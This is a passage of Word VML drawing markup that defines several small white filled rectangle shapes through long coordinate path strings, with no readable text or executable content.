8668,8198,8668,8197,8668,8196,8668,8194,8668,8193,8668,8192,8668,8190,8668,8189,8668,8187,8668,8185,8668,8184,8668,8182,8668,8180,8668,8178,8668,8177,8668,8175,8668,8173,8668,8171,8668,8168,8668,8166,8668,8164,8668,8162,8668,8159,8668,8157,8668,8154,8668,8152,8668,8149,8668,8146,8668,8143,8668,8141,8668,8138,8668,8135,8668,8132,8668,8128,8668,8125,8668,8122,8668,8118,8668,8115,8668,8111,8668,8108,8668,8104,8668,8100,8668,8096,8668,8092,8668,8088,8668,8084,8668,8080,8668,8076,8668,8071,8668,8067,8668,8062,8668,8057,8668,8053,8668,8048,8668,8043,8668,8038,8668,8033,8668,8027,8668,8022,8668,8017,8668,8011,8668,8005,8668,8000,8668,7994,8668,7988,8668,7982,8668,7976,8668,7969,8668,7963e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:438.500pt;margin-top:397.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8770,7950" coordsize="130,250">
        <v:shape style="position:absolute;left:8770;top:7950;width:130;height:250" coordorigin="8770,7950" coordsize="130,250" path="m8788,7963l8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8788,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8789,7963,8790,7963,8790,7963,8790,7963,8790,7963,8790,7963,8790,7963,8791,7963,8791,7963,8791,7963,8791,7963,8791,7963,8792,7963,8792,7963,8792,7963,8793,7963,8793,7963,8793,7963,8794,7963,8794,7963,8794,7963,8795,7963,8795,7963,8796,7963,8796,7963,8797,7963,8797,7963,8798,7963,8798,7963,8799,7963,8800,7963,8800,7963,8801,7963,8802,7963,8802,7963,8803,7963,8804,7963,8805,7963,8805,7963,8806,7963,8807,7963,8808,7963,8809,7963,8810,7963,8811,7963,8812,7963,8813,7963,8814,7963,8815,7963,8816,7963,8817,7963,8818,7963,8820,7963,8821,7963,8822,7963,8824,7963,8825,7963,8826,7963,8828,7963,8829,7963,8831,7963,8832,7963,8834,7963,8835,7963,8837,7963,8839,7963,8840,7963,8842,7963,8844,7963,8846,7963,8848,7963,8850,7963,8851,7963,8853,7963,8855,7963,8858,7963,8860,7963,8862,7963,8864,7963,8866,7963,8869,7963,8871,7963,8873,7963,8876,7963,8878,7963,8881,7963,8883,7963,8886,7963,8889,7963,8891,7963,8894,7963,8897,7963,8900,7963,8903,7963,8905,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7963,8908,7964,8908,7964,8908,7964,8908,7964,8908,7964,8908,7964,8908,7964,8908,7965,8908,7965,8908,7965,8908,7965,8908,7966,8908,7966,8908,7966,8908,7967,8908,7967,8908,7968,8908,7968,8908,7968,8908,7969,8908,7970,8908,7970,8908,7971,8908,7971,8908,7972,8908,7973,8908,7973,8908,7974,8908,7975,8908,7976,8908,7977,8908,7978,8908,7979,8908,7980,8908,7981,8908,7982,8908,7983,8908,7984,8908,7986,8908,7987,8908,7988,8908,7990,8908,7991,8908,7993,8908,7994,8908,7996,8908,7997,8908,7999,8908,8001,8908,8003,8908,8005,8908,8007,8908,8009,8908,8011,8908,8013,8908,8015,8908,8017,8908,8020,8908,8022,8908,8024,8908,8027,8908,8029,8908,8032,8908,8035,8908,8038,8908,8041,8908,8043,8908,8046,8908,8050,8908,8053,8908,8056,8908,8059,8908,8063,8908,8066,8908,8070,8908,8073,8908,8077,8908,8081,8908,8085,8908,8089,8908,8093,8908,8097,8908,8101,8908,8106,8908,8110,8908,8114,8908,8119,8908,8124,8908,8128,8908,8133,8908,8138,8908,8143,8908,8148,8908,8154,8908,8159,8908,8165,8908,8170,8908,8176,8908,8181,8908,8187,8908,8193,8908,8199,8908,8205,8908,8212,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8908,8218,8907,8218,8907,8218,8907,8218,8907,8218,8907,8218,8907,8218,8906,8218,8906,8218,8906,8218,8906,8218,8905,8218,8905,8218,8905,8218,8905,8218,8904,8218,8904,8218,8904,8218,8903,8218,8903,8218,8902,8218,8902,8218,8902,8218,8901,8218,8901,8218,8900,8218,8900,8218,8899,8218,8898,8218,8898,8218,8897,8218,8897,8218,8896,8218,8895,8218,8895,8218,8894,8218,8893,8218,8892,8218,8892,8218,8891,8218,8890,8218,8889,8218,8888,8218,8887,8218,8886,8218,8885,8218,8884,8218,8883,8218,8882,8218,8881,8218,8880,8218,8878,8218,8877,8218,8876,8218,8875,8218,8873,8218,8872,8218,8871,8218,8869,8218,8868,8218,8866,8218,8865,8218,8863,8218,8862,8218,8860,8218,8858,8218,8857,8218,8855,8218,8853,8218,8851,8218,8849,8218,8847,8218,8845,8218,8843,8218,8841,8218,8839,8218,8837,8218,8835,8218,8833,8218,8831,8218,8828,8218,8826,8218,8824,8218,8821,8218,8819,8218,8816,8218,8814,8218,8811,8218,8808,8218,8806,8218,8803,8218,8800,8218,8797,8218,8794,8218,8791,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8218,8788,8217,8788,8217,8788,8217,8788,8217,8788,8217,8788,8217,8788,8216,8788,8216,8788,8216,8788,8215,8788,8215,8788,8215,8788,8214,8788,8214,8788,8214,8788,8213,8788,8213,8788,8212,8788,8212,8788,8211,8788,8210,8788,8210,8788,8209,8788,8208,8788,8208,8788,8207,8788,8206,8788,8205,8788,8204,8788,8203,8788,8202,8788,8201,8788,8200,8788,8199,8788,8198,8788,8197,8788,8196,8788,8194,8788,8193,8788,8192,8788,8190,8788,8189,8788,8187,8788,8185,8788,8184,8788,8182,8788,8180,8788,8178,8788,8177,8788,8175,8788,8173,8788,8171,8788,8168,8788,8166,8788,8164,8788,8162,8788,8159,8788,8157,8788,8154,8788,8152,8788,8149,8788,8146,8788,8143,8788,8141,8788,8138,8788,8135,8788,8132,8788,8128,8788,8125,8788,8122,8788,8118,8788,8115,8788,8111,8788,8108,8788,8104,8788,8100,8788,8096,8788,8092,8788,8088,8788,8084,8788,8080,8788,8076,8788,8071,8788,8067,8788,8062,8788,8057,8788,8053,8788,8048,8788,8043,8788,8038,8788,8033,8788,8027,8788,8022,8788,8017,8788,8011,8788,8005,8788,8000,8788,7994,8788,7988,8788,7982,8788,7976,8788,7969,8788,7963e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:193.500pt;margin-top:410.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3870,8210" coordsize="130,270">
        <v:shape style="position:absolute;left:3870;top:8210;width:130;height:270" coordorigin="3870,8210" coordsize="130,270" path="m3881,8233l3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3881,8233,3882,8233,3882,8233,3882,8233,3882,8233,3882,8233,3882,8233,3882,8233,3882,8233,3883,8233,3883,8233,3883,8233,3883,8233,3883,8233,3884,8233,3884,8233,3884,8233,3884,8233,3885,8233,3885,8233,3885,8233,3886,8233,3886,8233,3886,8233,3887,8233,3887,8233,3887,8233,3888,8233,3888,8233,3889,8233,3889,8233,3890,8233,3890,8233,3891,8233,3892,8233,3892,8233,3893,8233,3893,8233,3894,8233,3895,8233,3896,8233,3896,8233,3897,8233,3898,8233,3899,8233,3900,8233,3901,8233,3901,8233,3902,8233,3903,8233,3904,8233,3905,8233,3906,8233,3908,8233,3909,8233,3910,8233,3911,8233,3912,8233,3913,8233,3915,8233,3916,8233,3917,8233,3919,8233,3920,8233,3922,8233,3923,8233,3925,8233,3926,8233,3928,8233,3930,8233,3931,8233,3933,8233,3935,8233,3936,8233,3938,8233,3940,8233,3942,8233,3944,8233,3946,8233,3948,8233,3950,8233,3952,8233,3954,8233,3957,8233,3959,8233,3961,8233,3963,8233,3966,8233,3968,8233,3971,8233,3973,8233,3976,8233,3978,8233,3981,8233,3984,8233,3987,8233,3989,8233,3992,8233,3995,8233,3998,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8234,4001,8234,4001,8234,4001,8234,4001,8234,4001,8234,4001,8234,4001,8235,4001,8235,4001,8235,4001,8235,4001,8236,4001,8236,4001,8236,4001,8236,4001,8237,4001,8237,4001,8238,4001,8238,4001,8239,4001,8239,4001,8240,4001,8240,4001,8241,4001,8241,4001,8242,4001,8243,4001,8244,4001,8244,4001,8245,4001,8246,4001,8247,4001,8248,4001,8249,4001,8250,4001,8251,4001,8252,4001,8253,4001,8254,4001,8256,4001,8257,4001,8258,4001,8260,4001,8261,4001,8263,4001,8264,4001,8266,4001,8268,4001,8269,4001,8271,4001,8273,4001,8275,4001,8277,4001,8279,4001,8281,4001,8283,4001,8285,4001,8287,4001,8290,4001,8292,4001,8294,4001,8297,4001,8300,4001,8302,4001,8305,4001,8308,4001,8311,4001,8314,4001,8317,4001,8320,4001,8323,4001,8326,4001,8329,4001,8333,4001,8336,4001,8340,4001,8344,4001,8347,4001,8351,4001,8355,4001,8359,4001,8363,4001,8367,4001,8371,4001,8376,4001,8380,4001,8385,4001,8389,4001,8394,4001,8399,4001,8403,4001,8408,4001,8413,4001,8419,4001,8424,4001,8429,4001,8435,4001,8440,4001,8446,4001,8452,4001,8457,4001,8463,4001,8469,4001,8476,4001,8482,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4000,8488,4000,8488,4000,8488,4000,8488,4000,8488,4000,8488,4000,8488,4000,8488,3999,8488,3999,8488,3999,8488,3999,8488,3999,8488,3998,8488,3998,8488,3998,8488,3998,8488,3997,8488,3997,8488,3997,8488,3996,8488,3996,8488,3996,8488,3995,8488,3995,8488,3995,8488,3994,8488,3994,8488,3993,8488,3993,8488,3992,8488,3992,8488,3991,8488,3990,8488,3990,8488,3989,8488,3989,8488,3988,8488,3987,8488,3986,8488,3986,8488,3985,8488,3984,8488,3983,8488,3982,8488,3981,8488,3981,8488,3980,8488,3979,8488,3978,8488,3977,8488,3976,8488,3974,8488,3973,8488,3972,8488,3971,8488,3970,8488,3968,8488,3967,8488,3966,8488,3965,8488,3963,8488,3962,8488,3960,8488,3959,8488,3957,8488,3956,8488,3954,8488,3952,8488,3951,8488,3949,8488,3947,8488,3946,8488,3944,8488,3942,8488,3940,8488,3938,8488,3936,8488,3934,8488,3932,8488,3930,8488,3928,8488,3925,8488,3923,8488,3921,8488,3919,8488,3916,8488,3914,8488,3911,8488,3909,8488,3906,8488,3904,8488,3901,8488,3898,8488,3895,8488,3893,8488,3890,8488,3887,8488,3884,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8488,3881,8487,3881,8487,3881,8487,3881,8487,3881,8487,3881,8486,3881,8486,3881,8486,3881,8486,3881,8485,3881,8485,3881,8485,3881,8484,3881,8484,3881,8483,3881,8483,3881,8482,3881,8482,3881,8481,3881,8481,3881,8480,3881,8479,3881,8479,3881,8478,3881,8477,3881,8476,3881,8475,3881,8474,3881,8474,3881,8473,3881,8472,3881,8470,3881,8469,3881,8468,3881,8467,3881,8466,3881,8464,3881,8463,3881,8462,3881,8460,3881,8459,3881,8457,3881,8456,3881,8454,3881,8452,3881,8450,3881,8449,3881,8447,3881,8445,3881,8443,3881,8441,3881,8439,3881,8436,3881,8434,3881,8432,3881,8429,3881,8427,3881,8424,3881,8422,3881,8419,3881,8416,3881,8414,3881,8411,3881,8408,3881,8405,3881,8402,3881,8399,3881,8395,3881,8392,3881,8389,3881,8385,3881,8382,3881,8378,3881,8374,3881,8370,3881,8367,3881,8363,3881,8358,3881,8354,3881,8350,3881,8346,3881,8341,3881,8337,3881,8332,3881,8328,3881,8323,3881,8318,3881,8313,3881,8308,3881,8303,3881,8298,3881,8292,3881,8287,3881,8281,3881,8276,3881,8270,3881,8264,3881,8258,3881,8252,3881,8246,3881,8240,3881,8233e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:199.500pt;margin-top:410.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3990,8210" coordsize="130,270">
        <v:shape style="position:absolute;left:3990;top:8210;width:130;height:270" coordorigin="3990,8210" coordsize="130,270" path="m4001,8233l4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4003,8233,4003,8233,4003,8233,4003,8233,4003,8233,4004,8233,4004,8233,4004,8233,4004,8233,4005,8233,4005,8233,4005,8233,4006,8233,4006,8233,4006,8233,4007,8233,4007,8233,4008,8233,4008,8233,4008,8233,4009,8233,4009,8233,4010,8233,4010,8233,4011,8233,4012,8233,4012,8233,4013,8233,4014,8233,4014,8233,4015,8233,4016,8233,4016,8233,4017,8233,4018,8233,4019,8233,4020,8233,4021,8233,4021,8233,4022,8233,4023,8233,4024,8233,4025,8233,4027,8233,4028,8233,4029,8233,4030,8233,4031,8233,4032,8233,4034,8233,4035,8233,4036,8233,4037,8233,4039,8233,4040,8233,4042,8233,4043,8233,4045,8233,4046,8233,4048,8233,4050,8233,4051,8233,4053,8233,4055,8233,4056,8233,4058,8233,4060,8233,4062,8233,4064,8233,4066,8233,4068,8233,4070,8233,4072,8233,4074,8233,4077,8233,4079,8233,4081,8233,4083,8233,4086,8233,4088,8233,4091,8233,4093,8233,4096,8233,4098,8233,4101,8233,4104,8233,4107,8233,4109,8233,4112,8233,4115,8233,4118,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8235,4121,8235,4121,8235,4121,8235,4121,8236,4121,8236,4121,8236,4121,8236,4121,8237,4121,8237,4121,8238,4121,8238,4121,8239,4121,8239,4121,8240,4121,8240,4121,8241,4121,8241,4121,8242,4121,8243,4121,8244,4121,8244,4121,8245,4121,8246,4121,8247,4121,8248,4121,8249,4121,8250,4121,8251,4121,8252,4121,8253,4121,8254,4121,8256,4121,8257,4121,8258,4121,8260,4121,8261,4121,8263,4121,8264,4121,8266,4121,8268,4121,8269,4121,8271,4121,8273,4121,8275,4121,8277,4121,8279,4121,8281,4121,8283,4121,8285,4121,8287,4121,8290,4121,8292,4121,8294,4121,8297,4121,8300,4121,8302,4121,8305,4121,8308,4121,8311,4121,8314,4121,8317,4121,8320,4121,8323,4121,8326,4121,8329,4121,8333,4121,8336,4121,8340,4121,8344,4121,8347,4121,8351,4121,8355,4121,8359,4121,8363,4121,8367,4121,8371,4121,8376,4121,8380,4121,8385,4121,8389,4121,8394,4121,8399,4121,8403,4121,8408,4121,8413,4121,8419,4121,8424,4121,8429,4121,8435,4121,8440,4121,8446,4121,8452,4121,8457,4121,8463,4121,8469,4121,8476,4121,8482,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4119,8488,4119,8488,4119,8488,4119,8488,4119,8488,4118,8488,4118,8488,4118,8488,4117,8488,4117,8488,4117,8488,4117,8488,4116,8488,4116,8488,4115,8488,4115,8488,4115,8488,4114,8488,4114,8488,4113,8488,4113,8488,4112,8488,4112,8488,4111,8488,4110,8488,4110,8488,4109,8488,4109,8488,4108,8488,4107,8488,4106,8488,4106,8488,4105,8488,4104,8488,4103,8488,4102,8488,4102,8488,4101,8488,4100,8488,4099,8488,4098,8488,4097,8488,4096,8488,4094,8488,4093,8488,4092,8488,4091,8488,4090,8488,4089,8488,4087,8488,4086,8488,4085,8488,4083,8488,4082,8488,4080,8488,4079,8488,4077,8488,4076,8488,4074,8488,4073,8488,4071,8488,4069,8488,4067,8488,4066,8488,4064,8488,4062,8488,4060,8488,4058,8488,4056,8488,4054,8488,4052,8488,4050,8488,4048,8488,4045,8488,4043,8488,4041,8488,4039,8488,4036,8488,4034,8488,4031,8488,4029,8488,4026,8488,4024,8488,4021,8488,4018,8488,4016,8488,4013,8488,4010,8488,4007,8488,4004,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8487,4001,8487,4001,8487,4001,8487,4001,8487,4001,8486,4001,8486,4001,8486,4001,8486,4001,8485,4001,8485,4001,8485,4001,8484,4001,8484,4001,8483,4001,8483,4001,8482,4001,8482,4001,8481,4001,8481,4001,8480,4001,8479,4001,8479,4001,8478,4001,8477,4001,8476,4001,8475,4001,8474,4001,8474,4001,8473,4001,8472,4001,8470,4001,8469,4001,8468,4001,8467,4001,8466,4001,8464,4001,8463,4001,8462,4001,8460,4001,8459,4001,8457,4001,8456,4001,8454,4001,8452,4001,8450,4001,8449,4001,8447,4001,8445,4001,8443,4001,8441,4001,8439,4001,8436,4001,8434,4001,8432,4001,8429,4001,8427,4001,8424,4001,8422,4001,8419,4001,8416,4001,8414,4001,8411,4001,8408,4001,8405,4001,8402,4001,8399,4001,8395,4001,8392,4001,8389,4001,8385,4001,8382,4001,8378,4001,8374,4001,8370,4001,8367,4001,8363,4001,8358,4001,8354,4001,8350,4001,8346,4001,8341,4001,8337,4001,8332,4001,8328,4001,8323,4001,8318,4001,8313,4001,8308,4001,8303,4001,8298,4001,8292,4001,8287,4001,8281,4001,8276,4001,8270,4001,8264,4001,8258,4001,8252,4001,8246,4001,8240,4001,8233e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:8850;width:130;height:270" coordorigin="2650,8850" coordsize="130,270" path="m2665,8878l2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2667,8878,2667,8878,2667,8878,2667,8878,2667,8878,2667,8878,2668,8878,2668,8878,2668,8878,2668,8878,2669,8878,2669,8878,2669,8878,2670,8878,2670,8878,2670,8878,2671,8878,2671,8878,2671,8878,2672,8878,2672,8878,2673,8878,2673,8878,2674,8878,2674,8878,2675,8878,2675,8878,2676,8878,2677,8878,2677,8878,2678,8878,2679,8878,2679,8878,2680,8878,2681,8878,2682,8878,2682,8878,2683,8878,2684,8878,2685,8878,2686,8878,2687,8878,2688,8878,2689,8878,2690,8878,2691,8878,2692,8878,2693,8878,2694,8878,2695,8878,2697,8878,2698,8878,2699,8878,2700,8878,2702,8878,2703,8878,2705,8878,2706,8878,2708,8878,2709,8878,2711,8878,2712,8878,2714,8878,2716,8878,2717,8878,2719,8878,2721,8878,2723,8878,2725,8878,2726,8878,2728,8878,2730,8878,2732,8878,2734,8878,2737,8878,2739,8878,2741,8878,2743,8878,2745,8878,2748,8878,2750,8878,2753,8878,2755,8878,2758,8878,2760,8878,2763,8878,2765,8878,2768,8878,2771,8878,2774,8878,2777,8878,2779,8878,2782,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8880,2785,8880,2785,8880,2785,8880,2785,8880,2785,8881,2785,8881,2785,8881,2785,8881,2785,8882,2785,8882,2785,8883,2785,8883,2785,8883,2785,8884,2785,8884,2785,8885,2785,8886,2785,8886,2785,8887,2785,8887,2785,8888,2785,8889,2785,8890,2785,8891,2785,8891,2785,8892,2785,8893,2785,8894,2785,8895,2785,8896,2785,8897,2785,8899,2785,8900,2785,8901,2785,8902,2785,8904,2785,8905,2785,8907,2785,8908,2785,8910,2785,8911,2785,8913,2785,8915,2785,8916,2785,8918,2785,8920,2785,8922,2785,8924,2785,8926,2785,8928,2785,8930,2785,8933,2785,8935,2785,8937,2785,8940,2785,8942,2785,8945,2785,8948,2785,8950,2785,8953,2785,8956,2785,8959,2785,8962,2785,8965,2785,8968,2785,8971,2785,8975,2785,8978,2785,8982,2785,8985,2785,8989,2785,8993,2785,8996,2785,9000,2785,9004,2785,9008,2785,9012,2785,9017,2785,9021,2785,9025,2785,9030,2785,9034,2785,9039,2785,9044,2785,9049,2785,9054,2785,9059,2785,9064,2785,9069,2785,9075,2785,9080,2785,9086,2785,9091,2785,9097,2785,9103,2785,9109,2785,9115,2785,9121,2785,9127,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2784,9134,2784,9134,2784,9134,2784,9134,2784,9134,2784,9134,2783,9134,2783,9134,2783,9134,2783,9134,2783,9134,2782,9134,2782,9134,2782,9134,2781,9134,2781,9134,2781,9134,2780,9134,2780,9134,2780,9134,2779,9134,2779,9134,2778,9134,2778,9134,2778,9134,2777,9134,2776,9134,2776,9134,2775,9134,2775,9134,2774,9134,2774,9134,2773,9134,2772,9134,2772,9134,2771,9134,2770,9134,2769,9134,2768,9134,2768,9134,2767,9134,2766,9134,2765,9134,2764,9134,2763,9134,2762,9134,2761,9134,2760,9134,2759,9134,2758,9134,2757,9134,2755,9134,2754,9134,2753,9134,2752,9134,2750,9134,2749,9134,2748,9134,2746,9134,2745,9134,2743,9134,2742,9134,2740,9134,2738,9134,2737,9134,2735,9134,2733,9134,2732,9134,2730,9134,2728,9134,2726,9134,2724,9134,2722,9134,2720,9134,2718,9134,2716,9134,2714,9134,2712,9134,2710,9134,2708,9134,2705,9134,2703,9134,2701,9134,2698,9134,2696,9134,2693,9134,2691,9134,2688,9134,2685,9134,2683,9134,2680,9134,2677,9134,2674,9134,2671,9134,2668,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9132,2665,9132,2665,9132,2665,9132,2665,9132,2665,9131,2665,9131,2665,9131,2665,9130,2665,9130,2665,9130,2665,9129,2665,9129,2665,9128,2665,9128,2665,9127,2665,9127,2665,9126,2665,9125,2665,9125,2665,9124,2665,9123,2665,9122,2665,9122,2665,9121,2665,9120,2665,9119,2665,9118,2665,9117,2665,9116,2665,9115,2665,9114,2665,9112,2665,9111,2665,9110,2665,9108,2665,9107,2665,9106,2665,9104,2665,9103,2665,9101,2665,9099,2665,9098,2665,9096,2665,9094,2665,9092,2665,9090,2665,9088,2665,9086,2665,9084,2665,9082,2665,9079,2665,9077,2665,9075,2665,9072,2665,9070,2665,9067,2665,9064,2665,9062,2665,9059,2665,9056,2665,9053,2665,9050,2665,9047,2665,9044,2665,9041,2665,9037,2665,9034,2665,9030,2665,9027,2665,9023,2665,9020,2665,9016,2665,9012,2665,9008,2665,9004,2665,9000,2665,8995,2665,8991,2665,8987,2665,8982,2665,8978,2665,8973,2665,8968,2665,8963,2665,8958,2665,8953,2665,8948,2665,8943,2665,8938,2665,8932,2665,8927,2665,8921,2665,8915,2665,8909,2665,8903,2665,8897,2665,8891,2665,8885,2665,8878e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:8850;width:130;height:270" coordorigin="3010,8850" coordsize="130,270" path="m3026,8878l3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3028,8878,3028,8878,3028,8878,3028,8878,3029,8878,3029,8878,3029,8878,3029,8878,3030,8878,3030,8878,3030,8878,3031,8878,3031,8878,3032,8878,3032,8878,3032,8878,3033,8878,3033,8878,3034,8878,3034,8878,3035,8878,3036,8878,3036,8878,3037,8878,3037,8878,3038,8878,3039,8878,3039,8878,3040,8878,3041,8878,3042,8878,3043,8878,3043,8878,3044,8878,3045,8878,3046,8878,3047,8878,3048,8878,3049,8878,3050,8878,3051,8878,3052,8878,3053,8878,3054,8878,3056,8878,3057,8878,3058,8878,3059,8878,3061,8878,3062,8878,3063,8878,3065,8878,3066,8878,3068,8878,3069,8878,3071,8878,3072,8878,3074,8878,3076,8878,3077,8878,3079,8878,3081,8878,3083,8878,3085,8878,3087,8878,3089,8878,3091,8878,3093,8878,3095,8878,3097,8878,3099,8878,3101,8878,3103,8878,3106,8878,3108,8878,3110,8878,3113,8878,3115,8878,3118,8878,3120,8878,3123,8878,3126,8878,3128,8878,3131,8878,3134,8878,3137,8878,3140,8878,3143,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8880,3146,8880,3146,8880,3146,8880,3146,8880,3146,8881,3146,8881,3146,8881,3146,8881,3146,8882,3146,8882,3146,8883,3146,8883,3146,8883,3146,8884,3146,8884,3146,8885,3146,8886,3146,8886,3146,8887,3146,8887,3146,8888,3146,8889,3146,8890,3146,8891,3146,8891,3146,8892,3146,8893,3146,8894,3146,8895,3146,8896,3146,8897,3146,8899,3146,8900,3146,8901,3146,8902,3146,8904,3146,8905,3146,8907,3146,8908,3146,8910,3146,8911,3146,8913,3146,8915,3146,8916,3146,8918,3146,8920,3146,8922,3146,8924,3146,8926,3146,8928,3146,8930,3146,8933,3146,8935,3146,8937,3146,8940,3146,8942,3146,8945,3146,8948,3146,8950,3146,8953,3146,8956,3146,8959,3146,8962,3146,8965,3146,8968,3146,8971,3146,8975,3146,8978,3146,8982,3146,8985,3146,8989,3146,8993,3146,8996,3146,9000,3146,9004,3146,9008,3146,9012,3146,9017,3146,9021,3146,9025,3146,9030,3146,9034,3146,9039,3146,9044,3146,9049,3146,9054,3146,9059,3146,9064,3146,9069,3146,9075,3146,9080,3146,9086,3146,9091,3146,9097,3146,9103,3146,9109,3146,9115,3146,9121,3146,9127,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3144,9134,3144,9134,3144,9134,3144,9134,3144,9134,3144,9134,3143,9134,3143,9134,3143,9134,3143,9134,3143,9134,3142,9134,3142,9134,3142,9134,3141,9134,3141,9134,3141,9134,3140,9134,3140,9134,3140,9134,3139,9134,3139,9134,3138,9134,3138,9134,3137,9134,3137,9134,3136,9134,3136,9134,3135,9134,3134,9134,3134,9134,3133,9134,3132,9134,3132,9134,3131,9134,3130,9134,3129,9134,3129,9134,3128,9134,3127,9134,3126,9134,3125,9134,3124,9134,3123,9134,3122,9134,3121,9134,3120,9134,3119,9